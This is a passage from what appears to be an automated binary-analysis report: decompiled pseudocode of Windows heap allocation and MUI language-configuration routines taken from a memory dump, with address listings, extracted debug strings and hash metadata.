                                                                            							if( *(_t270 + 0xc) == 0) {
                                                                            								_push("HEAP: ");
                                                                            								E0107B150();
                                                                            							} else {
                                                                            								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            							}
                                                                            							_push("(!TrailingUCR)");
                                                                            							E0107B150();
                                                                            							__eflags =  *0x1167bc8;
                                                                            							if( *0x1167bc8 == 0) {
                                                                            								__eflags = 0;
                                                                            								E01132073(_t445, 1, _t541, 0);
                                                                            							}
                                                                            							L152:
                                                                            							_t445 = _a4;
                                                                            							L153:
                                                                            							_t513 = _v48;
                                                                            							goto L9;
                                                                            						}
                                                                            						_v32 = _t267;
                                                                            						_t280 = _t267 - _t455;
                                                                            						_v32 = _v32 - _t455;
                                                                            						__eflags = _a8;
                                                                            						_t460 = _v32;
                                                                            						_v52 = _t460;
                                                                            						if(_a8 != 0) {
                                                                            							L27:
                                                                            							__eflags = _t280;
                                                                            							if(_t280 == 0) {
                                                                            								L33:
                                                                            								_t446 = 0;
                                                                            								__eflags = _v40;
                                                                            								if(_v40 == 0) {
                                                                            									_t468 = _v44 + _v52;
                                                                            									_v36 = _t468;
                                                                            									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                            									__eflags = _v20 - _v52 + _v44;
                                                                            									if(_v20 == _v52 + _v44) {
                                                                            										__eflags =  *(_t553 + 0x4c);
                                                                            										if( *(_t553 + 0x4c) != 0) {
                                                                            											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                                            											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                                            										}
                                                                            									} else {
                                                                            										_t468[3] = 0;
                                                                            										_t468[1] = 0;
                                                                            										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                                            										_t521 = _t317;
                                                                            										 *_t468 = _t317;
                                                                            										__eflags =  *0x1168748 - 1; // 0x0
                                                                            										if(__eflags >= 0) {
                                                                            											__eflags = _t521 - 1;
                                                                            											if(_t521 <= 1) {
                                                                            												_t327 =  *[fs:0x30];
                                                                            												__eflags =  *(_t327 + 0xc);
                                                                            												if( *(_t327 + 0xc) == 0) {
                                                                            													_push("HEAP: ");
                                                                            													E0107B150();
                                                                            												} else {
                                                                            													E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            												}
                                                                            												_push("(LONG)FreeEntry->Size > 1");
                                                                            												E0107B150();
                                                                            												__eflags =  *0x1167bc8 - _t446; // 0x0
                                                                            												if(__eflags == 0) {
                                                                            													__eflags = 1;
                                                                            													E01132073(_t446, 1, _t541, 1);
                                                                            												}
                                                                            												_t468 = _v36;
                                                                            											}
                                                                            										}
                                                                            										_t468[1] = _t446;
                                                                            										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                                            										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                            										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                                            											_t320 = _t446;
                                                                            										} else {
                                                                            											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                                            											_v12 = _t320;
                                                                            											__eflags = _t320 - 0xfe;
                                                                            											if(_t320 >= 0xfe) {
                                                                            												_push(_t468);
                                                                            												_push(_t446);
                                                                            												E0113A80D(_t522, 3, _t468, _t541);
                                                                            												_t468 = _v52;
                                                                            												_t320 = _v28;
                                                                            											}
                                                                            										}
                                                                            										_t468[3] = _t320;
                                                                            										E0109A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                                            									}
                                                                            								}
                                                                            								E0109B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                                            								E0109A830(_t553, _v64, _v24);
                                                                            								_t286 = E01097D50();
                                                                            								_t542 = 0x7ffe0380;
                                                                            								__eflags = _t286;
                                                                            								if(_t286 != 0) {
                                                                            									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            								} else {
                                                                            									_t289 = 0x7ffe0380;
                                                                            								}
                                                                            								__eflags =  *_t289;
                                                                            								if( *_t289 != 0) {
                                                                            									_t290 =  *[fs:0x30];
                                                                            									__eflags =  *(_t290 + 0x240) & 1;
                                                                            									if(( *(_t290 + 0x240) & 1) != 0) {
                                                                            										__eflags = E01097D50();
                                                                            										if(__eflags != 0) {
                                                                            											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            										}
                                                                            										E01131411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                                            									}
                                                                            								}
                                                                            								_t291 = E01097D50();
                                                                            								_t543 = 0x7ffe038a;
                                                                            								__eflags = _t291;
                                                                            								if(_t291 != 0) {
                                                                            									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            								} else {
                                                                            									_t246 = 0x7ffe038a;
                                                                            								}
                                                                            								__eflags =  *_t246;
                                                                            								if( *_t246 != 0) {
                                                                            									__eflags = E01097D50();
                                                                            									if(__eflags != 0) {
                                                                            										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            										__eflags = _t543;
                                                                            									}
                                                                            									_push( *_t543 & 0x000000ff);
                                                                            									_push(_t446);
                                                                            									_push(_t446);
                                                                            									L120:
                                                                            									_push( *(_t553 + 0x74) << 3);
                                                                            									_push(_v52);
                                                                            									_t246 = E01131411(_t446, _t553, _v44, __eflags);
                                                                            								}
                                                                            								goto L7;
                                                                            							}
                                                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                            							_t339 = E010A174B( &_v44,  &_v52, 0x4000);
                                                                            							__eflags = _t339;
                                                                            							if(_t339 < 0) {
                                                                            								L94:
                                                                            								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                                            								__eflags = _v40;
                                                                            								if(_v40 == 0) {
                                                                            									goto L153;
                                                                            								}
                                                                            								E0109B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                                            								goto L152;
                                                                            							}
                                                                            							_t344 = E01097D50();
                                                                            							__eflags = _t344;
                                                                            							if(_t344 != 0) {
                                                                            								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            							} else {
                                                                            								_t347 = 0x7ffe0380;
                                                                            							}
                                                                            							__eflags =  *_t347;
                                                                            							if( *_t347 != 0) {
                                                                            								_t348 =  *[fs:0x30];
                                                                            								__eflags =  *(_t348 + 0x240) & 1;
                                                                            								if(( *(_t348 + 0x240) & 1) != 0) {
                                                                            									E011314FB(_t445, _t553, _v44, _v52, 6);
                                                                            								}
                                                                            							}
                                                                            							_t513 = _v48;
                                                                            							goto L33;
                                                                            						}
                                                                            						__eflags =  *_v12 - 3;
                                                                            						_t513 = _v48;
                                                                            						if( *_v12 == 3) {
                                                                            							goto L27;
                                                                            						}
                                                                            						__eflags = _t460;
                                                                            						if(_t460 == 0) {
                                                                            							goto L9;
                                                                            						}
                                                                            						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                                            						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                                            							goto L9;
                                                                            						}
                                                                            						goto L27;
                                                                            					}
                                                                            				}
                                                                            				_t445 = _a4;
                                                                            				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                                            					_t513 = __edx;
                                                                            					goto L10;
                                                                            				}
                                                                            				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                                            				_v20 = _t433;
                                                                            				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                                            					_t513 = _t539;
                                                                            					goto L9;
                                                                            				} else {
                                                                            					_t437 = E010999BF(__ecx, __edx,  &_a4, 0);
                                                                            					_t445 = _a4;
                                                                            					_t514 = _t437;
                                                                            					_v56 = _t514;
                                                                            					if(_t445 - 0x201 > 0xfbff) {
                                                                            						goto L14;
                                                                            					} else {
                                                                            						E0109A830(__ecx, _t514, _t445);
                                                                            						_t506 =  *(_t553 + 0x238);
                                                                            						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                                            						_t246 = _t506 >> 4;
                                                                            						if(_t551 < _t506 - _t246) {
                                                                            							_t508 =  *(_t553 + 0x23c);
                                                                            							_t246 = _t508 >> 2;
                                                                            							__eflags = _t551 - _t508 - _t246;
                                                                            							if(_t551 > _t508 - _t246) {
                                                                            								_t246 = E010AABD8(_t553);
                                                                            								 *(_t553 + 0x23c) = _t551;
                                                                            								 *(_t553 + 0x238) = _t551;
                                                                            							}
                                                                            						}
                                                                            						goto L7;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            0x00000000
                                                                            0x010e2295
                                                                            0x0109a485
                                                                            0x0109a489
                                                                            0x0109a48b
                                                                            0x0109a48f
                                                                            0x0109a493
                                                                            0x0109a497
                                                                            0x0109a49b
                                                                            0x0109a4bb
                                                                            0x0109a4bb
                                                                            0x0109a4bd
                                                                            0x0109a4ff
                                                                            0x0109a4ff
                                                                            0x0109a501
                                                                            0x0109a505
                                                                            0x0109a50f
                                                                            0x0109a517
                                                                            0x0109a51b
                                                                            0x0109a527
                                                                            0x0109a52b
                                                                            0x010e2182
                                                                            0x010e2185
                                                                            0x010e2193
                                                                            0x010e2199
                                                                            0x010e2199
                                                                            0x0109a531
                                                                            0x0109a535
                                                                            0x0109a538
                                                                            0x0109a548
                                                                            0x0109a54b
                                                                            0x0109a54d
                                                                            0x0109a553
                                                                            0x0109a559
                                                                            0x010e2100
                                                                            0x010e2103
                                                                            0x010e2109
                                                                            0x010e210f
                                                                            0x010e2112
                                                                            0x010e2131
                                                                            0x010e2136
                                                                            0x010e2114
                                                                            0x010e2129
                                                                            0x010e212e
                                                                            0x010e213c
                                                                            0x010e2141
                                                                            0x010e2147
                                                                            0x010e214d
                                                                            0x010e2151
                                                                            0x010e2154
                                                                            0x010e2154
                                                                            0x010e2159
                                                                            0x010e2159
                                                                            0x010e2103
                                                                            0x0109a55f
                                                                            0x0109a562
                                                                            0x0109a565
                                                                            0x0109a567
                                                                            0x010e2162
                                                                            0x0109a56d
                                                                            0x0109a574
                                                                            0x0109a575
                                                                            0x0109a579
                                                                            0x0109a57e
                                                                            0x010e2169
                                                                            0x010e216a
                                                                            0x010e2170
                                                                            0x010e2175
                                                                            0x010e2179
                                                                            0x010e2179
                                                                            0x0109a57e
                                                                            0x0109a584
                                                                            0x0109a58f
                                                                            0x0109a58f
                                                                            0x0109a52b
                                                                            0x0109a5ad
                                                                            0x0109a5bc
                                                                            0x0109a5c1
                                                                            0x0109a5c6
                                                                            0x0109a5cb
                                                                            0x0109a5cd
                                                                            0x010e21a9
                                                                            0x0109a5d3
                                                                            0x0109a5d3
                                                                            0x0109a5d3
                                                                            0x0109a5d5
                                                                            0x0109a5d8
                                                                            0x010e21b3
                                                                            0x010e21bc
                                                                            0x010e21c2
                                                                            0x010e21cd
                                                                            0x010e21cf
                                                                            0x010e21da
                                                                            0x010e21da
                                                                            0x010e21da
                                                                            0x010e21f7
                                                                            0x010e21f7
                                                                            0x010e21c2
                                                                            0x0109a5de
                                                                            0x0109a5e3
                                                                            0x0109a5e8
                                                                            0x0109a5ea
                                                                            0x010e220a
                                                                            0x0109a5f0
                                                                            0x0109a5f0
                                                                            0x0109a5f0
                                                                            0x0109a5f2
                                                                            0x0109a5f5
                                                                            0x010e2219
                                                                            0x010e221b
                                                                            0x010e208c
                                                                            0x010e208c
                                                                            0x010e208c
                                                                            0x010e2095
                                                                            0x010e2096
                                                                            0x010e2097
                                                                            0x010e2098
                                                                            0x010e20a4
                                                                            0x010e20a5
                                                                            0x010e20a9
                                                                            0x010e20a9
                                                                            0x00000000
                                                                            0x0109a5f5
                                                                            0x0109a4bf
                                                                            0x0109a4d3
                                                                            0x0109a4d8
                                                                            0x0109a4da
                                                                            0x010e1ede
                                                                            0x010e1ede
                                                                            0x010e1ee4
                                                                            0x010e1ee9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1f07
                                                                            0x00000000
                                                                            0x010e1f07
                                                                            0x0109a4e0
                                                                            0x0109a4e5
                                                                            0x0109a4e7
                                                                            0x010e20cb
                                                                            0x0109a4ed
                                                                            0x0109a4ed
                                                                            0x0109a4ed
                                                                            0x0109a4f2
                                                                            0x0109a4f5
                                                                            0x010e20d5
                                                                            0x010e20de
                                                                            0x010e20e4
                                                                            0x010e20f6
                                                                            0x010e20f6
                                                                            0x010e20e4
                                                                            0x0109a4fb
                                                                            0x00000000
                                                                            0x0109a4fb
                                                                            0x0109a4a1
                                                                            0x0109a4a4
                                                                            0x0109a4a8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a4aa
                                                                            0x0109a4ac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a4b2
                                                                            0x0109a4b5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a4b5
                                                                            0x0109a43a
                                                                            0x0109a340
                                                                            0x0109a346
                                                                            0x0109a600
                                                                            0x00000000
                                                                            0x0109a600
                                                                            0x0109a34f
                                                                            0x0109a351
                                                                            0x0109a358
                                                                            0x0109a3c6
                                                                            0x00000000
                                                                            0x0109a371
                                                                            0x0109a37a
                                                                            0x0109a37f
                                                                            0x0109a382
                                                                            0x0109a384
                                                                            0x0109a394
                                                                            0x00000000
                                                                            0x0109a396
                                                                            0x0109a399
                                                                            0x0109a3a7
                                                                            0x0109a3b0
                                                                            0x0109a3b4
                                                                            0x0109a3bb
                                                                            0x0109a3d2
                                                                            0x0109a3da
                                                                            0x0109a3df
                                                                            0x0109a3e1
                                                                            0x0109a3e5
                                                                            0x0109a3ea
                                                                            0x0109a3f0
                                                                            0x0109a3f0
                                                                            0x0109a3e1
                                                                            0x00000000
                                                                            0x0109a3bb
                                                                            0x0109a394

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-523794902
                                                                            • Opcode ID: 8e80bf9b0859ce92757f3d8fc48f8217b80a77587da1bae2250da755f362e723
                                                                            • Instruction ID: eaa71ef219805a42634dfcc3c3899cb8a7fbc8db3a5c6b6271f34bade97db166
                                                                            • Opcode Fuzzy Hash: 8e80bf9b0859ce92757f3d8fc48f8217b80a77587da1bae2250da755f362e723
                                                                            • Instruction Fuzzy Hash: 4A42CD31608741DFDB15DF29C898A6ABBE5FF98204F0489ADF8C68B352D734D981CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
                                                                            			E01132D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				signed int _t83;
                                                                            				signed char _t89;
                                                                            				intOrPtr _t90;
                                                                            				signed char _t101;
                                                                            				signed int _t102;
                                                                            				intOrPtr _t104;
                                                                            				signed int _t105;
                                                                            				signed int _t106;
                                                                            				intOrPtr _t108;
                                                                            				intOrPtr _t112;
                                                                            				short* _t130;
                                                                            				short _t131;
                                                                            				signed int _t148;
                                                                            				intOrPtr _t149;
                                                                            				signed int* _t154;
                                                                            				short* _t165;
                                                                            				signed int _t171;
                                                                            				void* _t182;
                                                                            
                                                                            				_push(0x44);
                                                                            				_push(0x1150e80);
                                                                            				E010CD0E8(__ebx, __edi, __esi);
                                                                            				_t177 = __edx;
                                                                            				_t181 = __ecx;
                                                                            				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                                            				 *((char*)(_t182 - 0x1d)) = 0;
                                                                            				 *(_t182 - 0x24) = 0;
                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                            					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                            					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                                            					_t83 = E010740E1("RtlAllocateHeap");
                                                                            					__eflags = _t83;
                                                                            					if(_t83 == 0) {
                                                                            						L48:
                                                                            						 *(_t182 - 0x24) = 0;
                                                                            						L49:
                                                                            						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                            						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                                            						E011330C4();
                                                                            						goto L50;
                                                                            					}
                                                                            					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                                            					 *(_t182 - 0x28) = _t89;
                                                                            					 *(_t182 - 0x3c) = _t89;
                                                                            					_t177 =  *(_t182 + 8);
                                                                            					__eflags = _t177;
                                                                            					if(_t177 == 0) {
                                                                            						_t171 = 1;
                                                                            						__eflags = 1;
                                                                            					} else {
                                                                            						_t171 = _t177;
                                                                            					}
                                                                            					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                                            					__eflags = _t148 - 0x10;
                                                                            					if(_t148 < 0x10) {
                                                                            						_t148 = 0x10;
                                                                            					}
                                                                            					_t149 = _t148 + 8;
                                                                            					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                                            					__eflags = _t149 - _t177;
                                                                            					if(_t149 < _t177) {
                                                                            						L44:
                                                                            						_t90 =  *[fs:0x30];
                                                                            						__eflags =  *(_t90 + 0xc);
                                                                            						if( *(_t90 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E0107B150();
                                                                            						} else {
                                                                            							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                                            						E0107B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                                            						goto L48;
                                                                            					} else {
                                                                            						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                                            						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                                            							goto L44;
                                                                            						}
                                                                            						__eflags = _t89 & 0x00000001;
                                                                            						if((_t89 & 0x00000001) != 0) {
                                                                            							_t178 =  *(_t182 - 0x28);
                                                                            						} else {
                                                                            							E0108EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                                            							 *((char*)(_t182 - 0x1d)) = 1;
                                                                            							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                                            							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                                            						}
                                                                            						E01134496(_t181, 0);
                                                                            						_t177 = L01094620(_t181, _t181, _t178,  *(_t182 + 8));
                                                                            						 *(_t182 - 0x24) = _t177;
                                                                            						_t173 = 1;
                                                                            						E011349A4(_t181);
                                                                            						__eflags = _t177;
                                                                            						if(_t177 == 0) {
                                                                            							goto L49;
                                                                            						} else {
                                                                            							_t177 = _t177 + 0xfffffff8;
                                                                            							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                                            							if( *((char*)(_t177 + 7)) == 5) {
                                                                            								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                                            								__eflags = _t177;
                                                                            							}
                                                                            							_t154 = _t177;
                                                                            							 *(_t182 - 0x40) = _t177;
                                                                            							__eflags =  *(_t181 + 0x4c);
                                                                            							if( *(_t181 + 0x4c) != 0) {
                                                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                            								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                                            								if(__eflags != 0) {
                                                                            									_push(_t154);
                                                                            									_t173 = _t177;
                                                                            									E0112FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                                            								}
                                                                            							}
                                                                            							__eflags =  *(_t177 + 2) & 0x00000002;
                                                                            							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                                            								_t101 =  *(_t177 + 3);
                                                                            								 *(_t182 - 0x29) = _t101;
                                                                            								_t102 = _t101 & 0x000000ff;
                                                                            							} else {
                                                                            								_t130 = E01071F5B(_t177);
                                                                            								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                                            								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                                            								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                                            									 *_t130 = 0;
                                                                            								} else {
                                                                            									_t131 = E010A16C7(1, _t173);
                                                                            									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                                            									 *_t165 = _t131;
                                                                            									_t130 = _t165;
                                                                            								}
                                                                            								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                                            							}
                                                                            							 *(_t182 - 0x34) = _t102;
                                                                            							 *(_t182 - 0x28) = _t102;
                                                                            							__eflags =  *(_t181 + 0x4c);
                                                                            							if( *(_t181 + 0x4c) != 0) {
                                                                            								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                            								__eflags =  *_t177;
                                                                            							}
                                                                            							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                                            							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                                            								__eflags = 0;
                                                                            								E01134496(_t181, 0);
                                                                            							}
                                                                            							__eflags =  *(_t182 - 0x24) -  *0x1166360; // 0x0
                                                                            							_t104 =  *[fs:0x30];
                                                                            							if(__eflags != 0) {
                                                                            								_t105 =  *(_t104 + 0x68);
                                                                            								 *(_t182 - 0x4c) = _t105;
                                                                            								__eflags = _t105 & 0x00000800;
                                                                            								if((_t105 & 0x00000800) == 0) {
                                                                            									goto L49;
                                                                            								}
                                                                            								_t106 =  *(_t182 - 0x34);
                                                                            								__eflags = _t106;
                                                                            								if(_t106 == 0) {
                                                                            									goto L49;
                                                                            								}
                                                                            								__eflags = _t106 -  *0x1166364; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L49;
                                                                            								}
                                                                            								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1166366; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L49;
                                                                            								}
                                                                            								_t108 =  *[fs:0x30];
                                                                            								__eflags =  *(_t108 + 0xc);
                                                                            								if( *(_t108 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push(E0111D455(_t181,  *(_t182 - 0x28)));
                                                                            								_push( *(_t182 + 8));
                                                                            								E0107B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                                            								goto L34;
                                                                            							} else {
                                                                            								__eflags =  *(_t104 + 0xc);
                                                                            								if( *(_t104 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push( *(_t182 + 8));
                                                                            								E0107B150("Just allocated block at %p for %Ix bytes\n",  *0x1166360);
                                                                            								L34:
                                                                            								_t112 =  *[fs:0x30];
                                                                            								__eflags =  *((char*)(_t112 + 2));
                                                                            								if( *((char*)(_t112 + 2)) != 0) {
                                                                            									 *0x1166378 = 1;
                                                                            									 *0x11660c0 = 0;
                                                                            									asm("int3");
                                                                            									 *0x1166378 = 0;
                                                                            								}
                                                                            								goto L49;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					_t181 =  *0x1165708; // 0x0
                                                                            					 *0x116b1e0(__ecx, __edx,  *(_t182 + 8));
                                                                            					 *_t181();
                                                                            					L50:
                                                                            					return E010CD130(0, _t177, _t181);
                                                                            				}
                                                                            			}






















                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                            • API String ID: 0-1745908468
                                                                            • Opcode ID: 325c738028b9513a6aa5440115bf36e7410acf6803add03abac3239a8b7fede3
                                                                            • Instruction ID: f3015f097a358881c63c7f2146433721b67911e3a939370cd083a52b932bc97f
                                                                            • Opcode Fuzzy Hash: 325c738028b9513a6aa5440115bf36e7410acf6803add03abac3239a8b7fede3
                                                                            • Instruction Fuzzy Hash: DB913430910641DFDB2AEFA8D450AADFBF2FF89700F18802CE495AB255C7329882CB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E01083D34(signed int* __ecx) {
                                                                            				signed int* _v8;
                                                                            				char _v12;
                                                                            				signed int* _v16;
                                                                            				signed int* _v20;
                                                                            				char _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				char _v36;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				signed int* _v48;
                                                                            				signed int* _v52;
                                                                            				signed int _v56;
                                                                            				signed int _v60;
                                                                            				char _v68;
                                                                            				signed int _t140;
                                                                            				signed int _t161;
                                                                            				signed int* _t236;
                                                                            				signed int* _t242;
                                                                            				signed int* _t243;
                                                                            				signed int* _t244;
                                                                            				signed int* _t245;
                                                                            				signed int _t255;
                                                                            				void* _t257;
                                                                            				signed int _t260;
                                                                            				void* _t262;
                                                                            				signed int _t264;
                                                                            				void* _t267;
                                                                            				signed int _t275;
                                                                            				signed int* _t276;
                                                                            				short* _t277;
                                                                            				signed int* _t278;
                                                                            				signed int* _t279;
                                                                            				signed int* _t280;
                                                                            				short* _t281;
                                                                            				signed int* _t282;
                                                                            				short* _t283;
                                                                            				signed int* _t284;
                                                                            				void* _t285;
                                                                            
                                                                            				_v60 = _v60 | 0xffffffff;
                                                                            				_t280 = 0;
                                                                            				_t242 = __ecx;
                                                                            				_v52 = __ecx;
                                                                            				_v8 = 0;
                                                                            				_v20 = 0;
                                                                            				_v40 = 0;
                                                                            				_v28 = 0;
                                                                            				_v32 = 0;
                                                                            				_v44 = 0;
                                                                            				_v56 = 0;
                                                                            				_t275 = 0;
                                                                            				_v16 = 0;
                                                                            				if(__ecx == 0) {
                                                                            					_t280 = 0xc000000d;
                                                                            					_t140 = 0;
                                                                            					L50:
                                                                            					 *_t242 =  *_t242 | 0x00000800;
                                                                            					_t242[0x13] = _t140;
                                                                            					_t242[0x16] = _v40;
                                                                            					_t242[0x18] = _v28;
                                                                            					_t242[0x14] = _v32;
                                                                            					_t242[0x17] = _t275;
                                                                            					_t242[0x15] = _v44;
                                                                            					_t242[0x11] = _v56;
                                                                            					_t242[0x12] = _v60;
                                                                            					return _t280;
                                                                            				}
                                                                            				if(E01081B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                            					_v56 = 1;
                                                                            					if(_v8 != 0) {
                                                                            						L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                            					}
                                                                            					_v8 = _t280;
                                                                            				}
                                                                            				if(E01081B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                            					_v60 =  *_v8;
                                                                            					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                            					_v8 = _t280;
                                                                            				}
                                                                            				if(E01081B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                            					L16:
                                                                            					if(E01081B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                            						L28:
                                                                            						if(E01081B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                            							L46:
                                                                            							_t275 = _v16;
                                                                            							L47:
                                                                            							_t161 = 0;
                                                                            							L48:
                                                                            							if(_v8 != 0) {
                                                                            								L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                            							}
                                                                            							_t140 = _v20;
                                                                            							if(_t140 != 0) {
                                                                            								if(_t275 != 0) {
                                                                            									L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                            									_t275 = 0;
                                                                            									_v28 = 0;
                                                                            									_t140 = _v20;
                                                                            								}
                                                                            							}
                                                                            							goto L50;
                                                                            						}
                                                                            						_t167 = _v12;
                                                                            						_t255 = _v12 + 4;
                                                                            						_v44 = _t255;
                                                                            						if(_t255 == 0) {
                                                                            							_t276 = _t280;
                                                                            							_v32 = _t280;
                                                                            						} else {
                                                                            							_t276 = L01094620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                            							_t167 = _v12;
                                                                            							_v32 = _t276;
                                                                            						}
                                                                            						if(_t276 == 0) {
                                                                            							_v44 = _t280;
                                                                            							_t280 = 0xc0000017;
                                                                            							goto L46;
                                                                            						} else {
